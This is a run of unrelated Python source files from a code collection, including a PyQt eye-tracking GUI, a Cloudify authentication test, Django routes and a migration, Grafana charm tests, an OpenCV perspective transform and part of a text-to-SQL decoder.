main_window.ResultLable.setStyleSheet(\"color: rgb(189, 189, 189); font: 24pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Result...\")\n Alert(return_string)\n\n def raise_alert(self, text):\n \"\"\"\n Linking method between prediction threads and gui_module Alert object (using signals).\n :param text: Text to present. \n :return: void\n \"\"\"\n Alert(text)\n\n def stop_thread(self):\n \"\"\"\n Predict tab: \"Cancel\" button.\n Stop prediction processing.\n :return: void\n \"\"\"\n main_window.ResultLable.setText(\"Canceling...\")\n self.program_manager.stop_prediction()\n\n def set_train_test_num(self):\n \"\"\"\n Predict tab: \"Exclusion Criteria\" option.\n When an exclusion criteria is chosen, this method is called to update the existing items amount label.\n Items amount is based on the chosen criteria.\n Sets a default items number in the exclude line edit, as 25% of the existing items.\n :return: void\n \"\"\"\n # Get existing items amount for the chosen criteria & set the gui_module label\n label = main_window.ExclusionCriteriaComboBox.currentText()\n total = self.program_manager.get_different_items_amount_by_label(label)\n main_window.ItemsAmountLabel.setText(str(total))\n # Set default exclude value\n exclude = int((total*25)/100)\n main_window.ExcludeLineEdit.setText(str(exclude))\n\n def set_ml_model(self):\n \"\"\"\n Predict tab: \"ML Model\" list.\n Load available models.\n :return: void\n \"\"\"\n try:\n # Load available models list. Will work only after the app is up and running\n self.program_manager.set_ml_model(main_window.MLModelComboBox.currentText())\n except:\n # app initialization isn't finished, and main_window doesn't exists yet\n pass\n\n def set_extractor_and_load_features(self):\n \"\"\"\n Predict tab: \"Feature Extractor\" list.\n Load available extractors.\n :return: void\n \"\"\"\n try:\n # load available extractors list. will work only after the app is up and running\n self.program_manager.set_extractor(main_window.ExtractorComboBox.currentText())\n\n # load available features list. will work only after extractors loading\n main_window.FeaturesList.clear()\n main_window.FeaturesList.addItems(self.program_manager.get_ml_features())\n for index in range(main_window.FeaturesList.count()):\n item = main_window.FeaturesList.item(index)\n item.setCheckState(QtCore.Qt.Unchecked)\n except:\n # app initialization isn't finished, and main_window doesn't exists yet\n pass\n\n def tab_changed(self):\n \"\"\"\n Tab change event activates this method.\n Disables the start tab.\n Updates \"Predict\" tab's lists (only on the first visit of that tab).\n :return: \n \"\"\"\n main_window.tabWidget.setTabEnabled(0, False)\n\n if (not self.predict_tab_visited) and main_window.tabWidget.tabText(main_window.tabWidget.currentIndex()) == \"Predict\":\n self.set_ml_model()\n self.set_extractor_and_load_features()\n self.predict_tab_visited = True\n\n\n# Global GUI information\nqtCreatorFile = \"EyePredict_gui.ui\"\nUi_MainWindow, QtBaseClass = uic.loadUiType(os.path.dirname(__file__) + \"/\" + qtCreatorFile)\n\n\nclass EyePredictApp(QtWidgets.QMainWindow, Ui_MainWindow):\n \"\"\"\n The application object class. Creates the Eye-predict GUI.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Application initiating method.\n \"\"\"\n # Open EyePredict application\n QtWidgets.QMainWindow.__init__(self)\n Ui_MainWindow.__init__(self)\n self.setupUi(self)\n\n # Activate buttons, load list options\n self.logic = Logic()\n self._connect()\n self._load_lists_items()\n\n def _connect(self):\n \"\"\"\n Connect gui_module functions (such as buttons, lists, etc) to logic methods.\n :return: Void\n \"\"\"\n # Main + Data\n self.BrowseButton.clicked.connect(self.logic.browse_experiment_info_file)\n self.ReloadButton.clicked.connect(self.logic.browse_experiment_info_file)\n self.ApplyButton.clicked.connect(self.logic.apply_filter_query)\n self.LoadButton.clicked.connect(self.logic.load_data_filter_query)\n self.SaveButton.clicked.connect(self.logic.save_data_filter_query)\n # Visualization\n self.ProcessingMethodSlider.valueChanged.connect(self.logic.set_processing_method)\n self.VisualizeButton.clicked.connect(self.logic.visualize)\n # ML\n self.MLModelComboBox.currentIndexChanged.connect(self.logic.set_ml_model)\n self.ExtractorComboBox.currentIndexChanged.connect(self.logic.set_extractor_and_load_features)\n self.CrossValidationButton.clicked.connect(self.logic.cross_validation)\n self.FitModelButton.clicked.connect(self.logic.fit_model)\n self.PredictButton.clicked.connect(self.logic.predict)\n self.SaveModelButton.clicked.connect(self.logic.save_model)\n self.LoadModelButton.clicked.connect(self.logic.load_model)\n self.ExclusionCriteriaComboBox.currentIndexChanged.connect(self.logic.set_train_test_num)\n self.tabWidget.currentChanged.connect(self.logic.tab_changed)\n self.CancelButton.clicked.connect(self.logic.stop_thread)\n self.CancelButton.hide()\n\n def _load_lists_items(self):\n \"\"\"\n Loads lists information.\n Lists content depends on available implementations, and so is due to changes.\n :return: void\n \"\"\"\n self.VisuTypeList.addItems(self.logic.program_manager.get_visu_types())\n self.MLModelComboBox.addItems(self.logic.program_manager.get_available_models())\n self.ExtractorComboBox.addItems(self.logic.program_manager.get_available_extractors())\n\n\ndef main():\n # Main. Program activation.\n global app, main_window\n app = QtWidgets.QApplication(sys.argv)\n main_window = EyePredictApp()\n main_window.show()\n sys.exit(app.exec_())\n","sub_path":"EyePredict/modules/gui_module/gui_logic.py","file_name":"gui_logic.py","file_ext":"py","file_size_in_byte":25898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218030375","text":"########\n# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport shutil\n\nfrom cloudify_rest_client.client import CloudifyClient\nfrom cloudify_rest_client.exceptions import CloudifyClientError\n\nfrom cosmo_tester.test_suites.test_security.security_test_base import \\\n SecurityTestBase\nfrom cosmo_tester.framework import util\n\n\nCUSTOM_AUTH_PROVIDER_PLUGIN = 'mock-auth-provider-with-no-userstore'\nPLUGINS_PROP_PATH = 'node_templates.manager.properties.cloudify.plugins'\n\n\nclass NoUserstoreTests(SecurityTestBase):\n\n def test_authentication_without_userstore(self):\n self.setup_secured_manager()\n self._assert_unauthorized_user_fails()\n\n def get_manager_blueprint_additional_props_override(self):\n src_plugin_dir = util.get_plugin_path(CUSTOM_AUTH_PROVIDER_PLUGIN)\n shutil.copytree(src_plugin_dir,\n self.test_manager_blueprint_path.dirname() /\n CUSTOM_AUTH_PROVIDER_PLUGIN)\n return {PLUGINS_PROP_PATH: self.get_plugins_settings()}\n\n def get_plugins_settings(self):\n return {\n 'user_custom_auth_provider': {\n 'source': CUSTOM_AUTH_PROVIDER_PLUGIN\n }\n }\n\n def get_authentication_providers_list(self):\n return [\n {\n 'implementation': 'mock_auth_provider_with_no_userstore'\n '.auth_without_userstore:AuthorizeUser1',\n 'name': 'password',\n 'properties': {\n 'dummy_param': 'dumdum'\n }\n }\n ]\n\n def get_userstore_drive(self):\n return ''\n\n def _assert_unauthorized_user_fails(self):\n client = CloudifyClient(host=self.env.management_ip,\n headers=util.get_auth_header(username='user2',\n password='pass2'))\n self.assertRaisesRegexp(CloudifyClientError, '401: user unauthorized',\n client.manager.get_status)\n","sub_path":"cosmo_tester/test_suites/test_security/no_userstore_tests.py","file_name":"no_userstore_tests.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218634368","text":"# Author: Aaditya Maheshwari\n# Version: 0.0.1\n# File_name: longest_word.py\n\n# Copyright 2016 Aaditya Maheshwari\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport doctest\n\n\ndef longest_word(sentence):\n \"\"\"\n Prints the longest word in a sentence.\n >>> longest_word(\"Python is amazing\")\n amazing\n >>> longest_word(\"Python is cool\")\n Python\n >>> longest_word(\"I am the best not you\")\n best\n \"\"\"\n\n words = sentence.split(\" \")\n long_word = None\n word_idx = 0\n while word_idx < len(words):\n current_word = words[word_idx]\n\n if long_word is None:\n long_word = current_word\n elif len(long_word) < len(current_word):\n long_word = current_word\n word_idx += 1\n print(long_word)\n\nif __name__ == '__main__':\n user_input = input(\"Please enter a sentence/text: \")\n longest_word(user_input)\n doctest.testmod()\n","sub_path":"longest_word.py","file_name":"longest_word.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181654341","text":"from django.conf.urls import url\nfrom django.urls import path , include\nfrom django.views.decorators.csrf import csrf_exempt\nfrom . import views\n\nurlpatterns = [\n path('', views.LeadListCreate.as_view()),\n path('auth/', include('djoser.urls')),\n path('auth/', include('djoser.urls.jwt')),\n path('<int:pk>/', views.DetailLead.as_view()),\n path('share', views.ShareView.as_view()),\n path('getAllDomains', views.SearchMultipledomain.as_view()),\n path('testSharing', views.TestSharingView.as_view()),\n path('updateJsonFile', views.UpdateJsonFile.as_view()),\n path('downloadEmails', views.DownloadEmailInCsv.as_view()),\n path('findervalidEmail', views.CreateEmailView.as_view()),\n]\n\n","sub_path":"Generation_2_lead/example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"543696438","text":"import json\nimport re\nimport PublicLib.public as pfun\nimport time\n\ng_cnt = 0\n\n\ndef subStrToJson(data):\n if data == None:\n return False, None\n # 原因在于:字符串里用单引号来标识字符\n data = re.sub('\\'', '\\\"', data)\n data = re.sub('\\n', '', data)\n\n # 字符串 转 json\n try:\n data_json = json.loads(data)\n if not IsJsonFrame(data_json):\n return False, 'Error_Json'\n except:\n print(data)\n return False, data\n # addr = data_json['DataValue']['04A20208']\n # print(addr)\n return True, data_json\n\n\n# 自定义 json 格式判断\ndef IsJsonFrame(dictdata):\n if dictdata is None:\n return False\n\n if isinstance(dictdata, dict) is False:\n return False\n\n dictlist = ['Len', 'Cmd', 'SN', 'DataTime', 'CRC', 'DataValue']\n for k in dictlist:\n if k not in dictdata:\n return False\n return True\n\n\n# dict recv, dict send\n# dict expect answer\n# answer\n# answer result\n# int threshold\ndef JsonDealFrame(recvframe, senddata, answer):\n answer['answerresult'] = {}\n if not IsJsonFrame(recvframe) or not IsJsonFrame(senddata):\n answer['result'] = 'frame error'\n return\n\n # 接收帧 去除头部结构\n if \"recvData\" in recvframe:\n recvframe = recvframe[\"recvData\"]\n\n # 帧序号相同\n if recvframe['SN'] != senddata['SN']:\n answer['result'] = 'sn error'\n return\n\n # 控制字相同\n if recvframe['Cmd'] != senddata['Cmd']:\n answer['result'] = 'cmd error'\n return\n\n # 预估返回值相同\n threshold = answer['threshold']\n answer['answer'] = recvframe['DataValue'].copy()\n answer['answerresult'] = recvframe['DataValue'].copy()\n\n for i, j in recvframe['DataValue'].items():\n if i in answer['expectanswer']:\n # threshold 判断:\n # 0: 绝对相等\n # 1: 门限内相等\n # -1: 不判断\n if threshold == 0:\n if answer['expectanswer'][i] == j:\n answer['answerresult'][i] = 'ok'\n else:\n answer['answerresult'][i] = 'error'\n elif threshold == -1:\n answer['answerresult'][i] = 'ok'\n else:\n recvvalue = float(j)\n answervalue = float(answer['expectanswer'][i])\n if answervalue * (1 - threshold) <= recvvalue <= answervalue * (1 + threshold):\n answer['answerresult'][i] = 'ok'\n else:\n answer['answerresult'][i] = 'error'\n\n return\n\n\n# parm\n# key:cmd value:Read/Set/..\n# DataValue dict key1:value1 ... key n:value n\ndef JsonMakeFrame(parm):\n global g_cnt\n g_cnt = g_cnt + 1\n if g_cnt > 9999:\n g_cnt = 0\n\n if \"Cmd\" in parm and \"DataValue\" in parm:\n datatime = time.strftime(\"%y%m%d%H%M%S\", time.localtime())\n data = dict(Len=\"312\", Cmd=parm[\"Cmd\"], SN=str(g_cnt), DataTime=datatime, CRC=\"FFFF\", DataValue=parm[\"DataValue\"])\n\n # 计算CRC\n dv = str(parm[\"DataValue\"]).replace(' ', '')\n dv = \"0000\" + pfun.crc16str(0, dv[1:-1], False)\n data[\"CRC\"] = dv[-4:]\n\n # 计算��度\n data[\"Len\"] = str(len(str(data)) - 12)\n else:\n data = dict(frame = 'error')\n\n # 将python对象data转换json对象\n data_json = json.dumps(data, ensure_ascii=False)\n\n # 将json对象转换成python对象\n # data_python = json.loads(data_json)\n\n return data_json\n\n\n'''\ndef JsonMakeValue(DIlist):\n for i in DIlist:\n Value =\n'''\n\nif __name__ == '__main__':\n # 数据项和内容\n # DIList = ['05060101', '05060102', '05060103']\n # ValueList = ['000000.00', '123.14', '778899']\n DIList = ['04A00501']\n ValueList = ['594C#03#03BC#0001#0001CA910001CA5D0001C9F50001EAE30001BCC50001BC810001BCA10001C9CD0001C9A50001C97D0001AF130001C9550001C92D0001E8D30001C92B0001D4AB0000973D00006DC300000000000000000001E8C7000000000000000000000000000000000000000000000000000000000001C9290001CC670001F1F1200009A8']\n List = dict(zip(DIList, ValueList))\n\n MakeFramePara = {}\n MakeFramePara['Cmd'] = 'Set'\n MakeFramePara['DataValue'] = List\n\n # CRC16 IBM: E8FE\n\n # 元组转json\n # DIValue = json.loads(data_python)\n\n # json 转 字符串\n data_python = JsonMakeFrame(MakeFramePara)\n print(data_python)\n\n # 字符串 转 json\n data = json.loads(data_python)\n ret = IsJsonFrame(data)\n print(ret)\n if ret:\n # dict expect answer\n # answer\n # answer result\n # int threshold\n dictanswer = {'threshold': 0.1, 'expectanswer': List}\n JsonDealFrame(data, data, dictanswer)\n for k in dictanswer:\n print(dictanswer[k])\n\n List['05060102'] = '199.29'\n dictanswer = {'threshold': 0.1, 'expectanswer': List}\n JsonDealFrame(data, data, dictanswer)\n for k in dictanswer:\n print(dictanswer[k])\n\n # a = JsonParse(data)\n '''\n for key in a:\n print(key)\n # print(a.key())\n #for key in a.iterkeys():\n print(a.values())\n for value in a.values():\n print(value)\n '''\n","sub_path":"Protocol/ly_Json.py","file_name":"ly_Json.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"618242069","text":"\"\"\"\nAuthor : Kyungmin Lee (rekyungmin@gmail.com)\nDate : 05/19/2019\nDescrip: Perpective transform\n\"\"\"\n\nimport io\nfrom typing import Iterable\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\n\ndef _transform(img: np.ndarray, coordinates: np.ndarray) -> np.ndarray:\n square_width = max(np.linalg.norm(coordinates[0] - coordinates[1]),\n np.linalg.norm(coordinates[2] - coordinates[3]))\n square_height = max(np.linalg.norm(coordinates[0] - coordinates[3]),\n np.linalg.norm(coordinates[1] - coordinates[2]))\n\n dst_coordinates = np.array([\n [0, 0],\n [square_width, 0],\n [square_width, square_height],\n [0, square_height]\n ], dtype=np.float32)\n\n transformation_matrix = cv2.getPerspectiveTransform(coordinates, dst_coordinates)\n return cv2.warpPerspective(img, transformation_matrix, dsize=(square_width, square_height))\n\n\ndef transform(bin_img: bytes, img_fmt: str, coordinates: Iterable[int]) -> bytes:\n if len(coordinates) != 4:\n raise TypeError('4 coordinates are required')\n\n pil_img = Image.open(io.BytesIO(bin_img))\n cv2_img = cv2.cvtColor(np.array(pil_img), cv2.COLOR_RGB2BGR)\n np_coordinates = np.array(coordinates, dtype=np.float32)\n\n transformed = _transform(cv2_img, np_coordinates)\n return cv2.imencode('.' + img_fmt, transformed)[1].tobytes()\n\n\nif __name__ == '__main__':\n print(cv2.__version__) # 4.1.0\n print(np.__version__) # 1.16.3\n print(Image.__version__) # 6.0.0\n","sub_path":"perspective.py","file_name":"perspective.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"548345910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Ad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create time')),\n ('hits', models.PositiveIntegerField(default=0, verbose_name='Hits', blank=True)),\n ('title', models.CharField(max_length=500, verbose_name='Title')),\n ('description', models.TextField(verbose_name='Description')),\n ('author', models.ForeignKey(default=None, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-pk'],\n 'verbose_name': 'ad',\n 'verbose_name_plural': 'ads',\n },\n ),\n migrations.CreateModel(\n name='AdUserHit',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField(auto_now_add=True)),\n ('ad', models.ForeignKey(to='ads.Ad')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-pk'],\n },\n ),\n ]\n","sub_path":"ads/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"173579603","text":"# Copyright 2020 Ryan Barry\n# See LICENSE file for licensing details.\n\nimport hashlib\nimport unittest\nimport yaml\nimport json\n\nfrom unittest.mock import patch\nfrom ops.testing import Harness\nfrom charm import GrafanaCharm\n\nMINIMAL_CONFIG = {\"grafana-image-path\": \"grafana/grafana\", \"port\": 3000}\n\nMINIMAL_DATASOURCES_CONFIG = {\n \"apiVersion\": 1,\n \"datasources\": [],\n \"deleteDatasources\": [],\n}\n\nBASIC_DATASOURCES = [\n {\n \"access\": \"proxy\",\n \"isDefault\": \"false\",\n \"name\": \"juju_test-model_abcdef_prometheus_0\",\n \"orgId\": \"1\",\n \"type\": \"prometheus\",\n \"url\": \"http://1.2.3.4:1234\",\n }\n]\n\nSOURCE_DATA = {\n \"model\": \"test-model\",\n \"model_uuid\": \"abcdef\",\n \"application\": \"prometheus\",\n \"type\": \"prometheus\",\n}\n\nDASHBOARD_CONFIG = {\n \"apiVersion\": 1,\n \"providers\": [\n {\n \"name\": \"Default\",\n \"type\": \"file\",\n \"options\": {\"path\": \"dashboards\"},\n }\n ],\n}\n\n\nDB_CONFIG = {\n \"type\": \"mysql\",\n \"host\": \"1.1.1.1:3306\",\n \"name\": \"mysqldb\",\n \"user\": \"grafana\",\n \"password\": \"grafana\",\n}\n\n\nDATABASE_CONFIG_INI = \"\"\"[database]\ntype = mysql\nhost = 1.1.1.1:3306\nname = mysqldb\nuser = grafana\npassword = grafana\nurl = mysql://grafana:grafana@1.1.1.1:3306/mysqldb\n\n\"\"\"\n\n\ndef datasource_config(config):\n config_yaml = config[1]\n config_dict = yaml.safe_load(config_yaml)\n return config_dict\n\n\ndef dashboard_config(config):\n config_yaml = config[1]\n config_dict = yaml.safe_load(config_yaml)\n return config_dict\n\n\ndef global_config(config):\n config_yaml = config[1]\n config_dict = yaml.safe_load(config_yaml)\n return config_dict[\"global\"]\n\n\ndef cli_arg(plan, cli_opt):\n plan_dict = plan.to_dict()\n args = plan_dict[\"services\"][\"grafana\"][\"command\"].split()\n for arg in args:\n opt_list = arg.split(\"=\")\n if len(opt_list) == 2 and opt_list[0] == cli_opt:\n return opt_list[1]\n if len(opt_list) == 1 and opt_list[0] == cli_opt:\n return opt_list[0]\n return None\n\n\nclass TestCharm(unittest.TestCase):\n def setUp(self):\n self.harness = Harness(GrafanaCharm)\n self.addCleanup(self.harness.cleanup)\n self.harness.begin()\n\n self.minimal_datasource_hash = hashlib.sha256(\n str(yaml.dump(MINIMAL_DATASOURCES_CONFIG)).encode(\"utf-8\")\n ).hexdigest()\n\n @patch(\"ops.testing._TestingPebbleClient.push\")\n def test_datasource_config_is_updated_by_raw_grafana_source_relation(self, push):\n self.harness.set_leader(True)\n\n # check datasource config is updated when a grafana-source joins\n rel_id = self.harness.add_relation(\"grafana-source\", \"prometheus\")\n self.harness.update_relation_data(\n rel_id, \"prometheus\", {\"grafana_source_data\": json.dumps(SOURCE_DATA)}\n )\n self.harness.add_relation_unit(rel_id, \"prometheus/0\")\n self.harness.update_relation_data(\n rel_id, \"prometheus/0\", {\"grafana_source_host\": \"1.2.3.4:1234\"}\n )\n\n config = push.call_args[0]\n self.assertEqual(\n datasource_config(config).get(\"datasources\"), BASIC_DATASOURCES\n )\n\n @patch(\"ops.testing._TestingPebbleClient.push\")\n def test_datasource_config_is_updated_by_grafana_source_removal(self, push):\n self.harness.set_leader(True)\n\n rel_id = self.harness.add_relation(\"grafana-source\", \"prometheus\")\n self.harness.update_relation_data(\n rel_id, \"prometheus\", {\"grafana_source_data\": json.dumps(SOURCE_DATA)}\n )\n self.harness.add_relation_unit(rel_id, \"prometheus/0\")\n self.harness.update_relation_data(\n rel_id, \"prometheus/0\", {\"grafana_source_host\": \"1.2.3.4:1234\"}\n )\n\n config = push.call_args[0]\n self.assertEqual(\n datasource_config(config).get(\"datasources\"), BASIC_DATASOURCES\n )\n\n rel = self.harness.charm.framework.model.get_relation(\"grafana-source\", rel_id)\n self.harness.charm.on[\"grafana-source\"].relation_departed.emit(rel)\n\n config = push.call_args[0]\n self.assertEqual(datasource_config(config).get(\"datasources\"), [])\n self.assertEqual(\n datasource_config(config).get(\"deleteDatasources\"),\n [{\"name\": \"juju_test-model_abcdef_prometheus_0\", \"orgId\": 1}],\n )\n\n @patch(\"ops.testing._TestingPebbleClient.push\")\n def test_config_is_updated_with_database_relation(self, push):\n self.harness.set_leader(True)\n\n rel_id = self.harness.add_relation(\"database\", \"mysql\")\n self.harness.add_relation_unit(rel_id, \"mysql/0\")\n self.harness.update_relation_data(\n rel_id,\n \"mysql\",\n DB_CONFIG,\n )\n\n config = push.call_args_list[0][0][1]\n self.assertEqual(config, DATABASE_CONFIG_INI)\n\n @patch(\"ops.testing._TestingPebbleClient.push\")\n def test_dashboard_path_is_initialized(self, push):\n self.harness.set_leader(True)\n\n self.harness.charm.init_dashboard_provisioning(\"dashboards\")\n\n config = push.call_args[0]\n self.assertEqual(dashboard_config(config), DASHBOARD_CONFIG)\n","sub_path":"tests/test_charm.py","file_name":"test_charm.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333844279","text":"import collections\nimport collections.abc\nimport copy\nimport csv\nimport itertools\nimport json\nimport os\n\nimport attr\nimport entmax\nimport enum\nimport torch\nimport torch.nn.functional as F\n\nfrom ratsql.models import abstract_preproc\nfrom ratsql.models import attention\nfrom ratsql.models import variational_lstm\nfrom ratsql.models.nl2code.decoder import NL2CodeDecoderPreproc\nfrom ratsql.models.head_corner.infer_tree_traversal import InferenceTreeTraversal\nfrom ratsql.models.head_corner.train_tree_traversal import TrainTreeTraversal\nfrom ratsql.models.head_corner.tree_traversal import TreeTraversal\nfrom ratsql.utils import registry\nfrom ratsql.utils import serialization\nfrom ratsql.utils import vocab\n\n\ndef lstm_init(device, num_layers, hidden_size, *batch_sizes):\n init_size = batch_sizes + (hidden_size,)\n if num_layers is not None:\n init_size = (num_layers,) + init_size\n init = torch.zeros(*init_size, device=device)\n return (init, init)\n\n\ndef maybe_stack(items, dim=None):\n to_stack = [item for item in items if item is not None]\n if not to_stack:\n return None\n elif len(to_stack) == 1:\n return to_stack[0].unsqueeze(dim)\n else:\n return torch.stack(to_stack, dim)\n\n\ndef accumulate_logprobs(d, keys_and_logprobs):\n for key, logprob in keys_and_logprobs:\n existing = d.get(key)\n if existing is None:\n d[key] = logprob\n else:\n d[key] = torch.logsumexp(\n torch.stack((logprob, existing), dim=0),\n dim=0)\n\n\ndef get_field_presence_info(ast_wrapper, node, field_infos):\n present = []\n for field_info in field_infos:\n field_value = node.get(field_info.name)\n is_present = field_value is not None and field_value != []\n\n maybe_missing = field_info.opt or field_info.seq\n is_builtin_type = field_info.type in ast_wrapper.primitive_types\n\n if maybe_missing and is_builtin_type:\n # TODO: make it possible to deal with \"singleton?\"\n present.append(is_present and type(field_value).__name__)\n elif maybe_missing and not is_builtin_type:\n present.append(is_present)\n #elif not maybe_missing and field_info.type in [\"table\", \"column\"]: ## added this condition...\n # assert is_present\n # present.append(True)\n elif not maybe_missing and is_builtin_type:\n present.append(type(field_value).__name__)\n elif not maybe_missing and not is_builtin_type:\n assert is_present\n present.append(True)\n return tuple(present)\n\n\ndef rule_match(string_lhs, rule_string, rule):\n \"\"\" Check if string '->' rule form matches with a rule \"\"\"\n if isinstance(rule[1], str):\n return rule_string == rule[0]+\" -> \"+rule[1]+\"/NULL\"\n elif isinstance(rule[1], tuple):\n return string_lhs == rule[0]\n else:\n return string_lhs == rule[0]\n\n\ndef get_rule_string_from_node(node_type, child_node, ast_wrapper):\n if isinstance(child_node, list):\n return node_type, len(child_node)\n elif node_type in ast_wrapper.product_types:\n return None\n elif not node_type:\n return None\n else:\n return node_type, child_node[\"_type\"]\n\n\n@attr.s\nclass PredictPreterminal:\n ttype = attr.ib()\n goal_type = attr.ib()\n\n def __dict__(self):\n return {\"ttype\": self.ttype,\n \"goal_type\": self.goal_type,\n \"class\": \"PredictPreterminal\"}\n\n@attr.s\nclass ExpandUp:\n rule = attr.ib()\n goal_type = attr.ib()\n\n def __dict__(self):\n return {\"rule\": self.rule,\n \"goal_type\": self.goal_type,\n \"class\": \"ExpandUp\"}\n\n@attr.s\nclass Point:\n ttype = attr.ib()\n value = attr.ib()\n\n def __dict__(self):\n return {\"value\": self.value,\n \"ttype\": self.ttype,\n \"class\": \"Point\"}\n\n\n\ndef get_rule_match_indices(string_lhs, rule_string, rule_index):\n return [rule_index[rule] for rule in rule_index if rule_match(string_lhs, rule_string, rule)]\n\n@registry.register('decoder', 'HeadCorner')\nclass HeadCornerDecoder(torch.nn.Module):\n Preproc = NL2CodeDecoderPreproc\n\n class Handler:\n handlers = {}\n\n @classmethod\n def register_handler(cls, func_type):\n if func_type in cls.handlers:\n raise RuntimeError(f\"{func_type} handler is already registered\")\n\n def inner_func(func):\n cls.handlers[func_type] = func.__name__\n return func\n\n return inner_func\n\n class State(enum.Enum):\n EXPAND_UP = 0\n PREDICT_HEAD_CORNER = 1\n POINT = 2\n\n def __init__(\n self,\n device,\n preproc,\n grammar_path,\n rule_emb_size=128,\n node_embed_size=64,\n # TODO: This should be automatically inferred from encoder\n enc_recurrent_size=256,\n recurrent_size=256,\n dropout=0.,\n desc_attn='bahdanau',\n copy_pointer=None,\n multi_loss_type='logsumexp',\n sup_att=None,\n use_align_mat=False,\n use_align_loss=False,\n enumerate_order=False,\n loss_type=\"softmax\"):\n super().__init__()\n self._device = device\n self.preproc = preproc\n self.ast_wrapper = preproc.ast_wrapper\n self.terminal_vocab = preproc.vocab\n self.preproc.primitive_types.append(\"singleton\")\n\n if self.preproc.use_seq_elem_rules:\n self.node_type_vocab = vocab.Vocab(\n sorted(self.preproc.primitive_types) +\n sorted(self.ast_wrapper.custom_primitive_types) +\n sorted(self.preproc.sum_type_constructors.keys()) +\n sorted(self.preproc.field_presence_infos.keys()) +\n sorted(self.preproc.seq_lengths.keys()),\n special_elems=())\n else:\n self.node_type_vocab = vocab.Vocab(\n sorted(self.preproc.primitive_types) +\n sorted(self.ast_wrapper.custom_primitive_types) +\n sorted(self.ast_wrapper.sum_types.keys()) +\n sorted(self.ast_wrapper.singular_types.keys()) +\n sorted(self.preproc.seq_lengths.keys()),\n special_elems=())\n\n self.all_rules, self.rules_index, self.parent_to_preterminal, self.preterminal_mask, self.preterminal_debug, \\\n self.preterminal_types, self.parent_to_hc, self.hc_table, self.hc_debug, self.parent_to_head, \\\n self.parent_to_rule = self.compute_rule_masks(grammar_path)\n\n\n # json.dump(dict(self.parent_to_preterminal), open('data/spider/head-corner-glove,cv_link=true/p.json'))\n #json.dump({\"parent_to_preterminal\": dict(self.parent_to_preterminal),\n # \"preterminal_mask\": dict(self.preterminal_mask),\n # \"parent_to_hc\": {key: sorted(list(self.parent_to_hc[key])) for key in self.parent_to_hc},\n # \"hc_table\": {key: dict(self.hc_table[key]) for key in self.hc_table},\n # \"parent_to_head\": dict(self.parent_to_head),\n # \"node_type_vocab_e2i\": dict(self.node_type_vocab.elem_to_id),\n # \"node_type_vocab_i2e\": dict(self.node_type_vocab.id_to_elem),\n # # \"terminal_vocab\": self.terminal_vocab,\n # # \"rules_index\": self.rules_index,\n # \"parent_to_rule\": dict(self.parent_to_rule),\n # },\n # open('data/spider/head-corner-glove,cv_link=true/head_corner_elems.json', 'w'))\n\n self.rule_emb_size = rule_emb_size\n self.node_emb_size = node_embed_size\n self.enc_recurrent_size = enc_recurrent_size\n self.recurrent_size = recurrent_size\n\n self.use_align_mat = use_align_mat\n self.use_align_loss = use_align_loss\n self.enumerate_order = enumerate_order\n\n if use_align_mat:\n from ratsql.models.spider import spider_dec_func\n self.compute_align_loss = lambda *args: \\\n spider_dec_func.compute_align_loss(self, *args)\n self.compute_pointer_with_align = lambda *args: \\\n spider_dec_func.compute_pointer_with_align_head_corner(self, *args)\n\n self.state_update = variational_lstm.RecurrentDropoutLSTMCell(\n input_size=self.rule_emb_size * 2 + self.enc_recurrent_size + self.recurrent_size * 2 + self.node_emb_size,\n hidden_size=self.recurrent_size,\n dropout=dropout)\n\n self.attn_type = desc_attn\n if desc_attn == 'bahdanau':\n self.desc_attn = attention.BahdanauAttention(\n 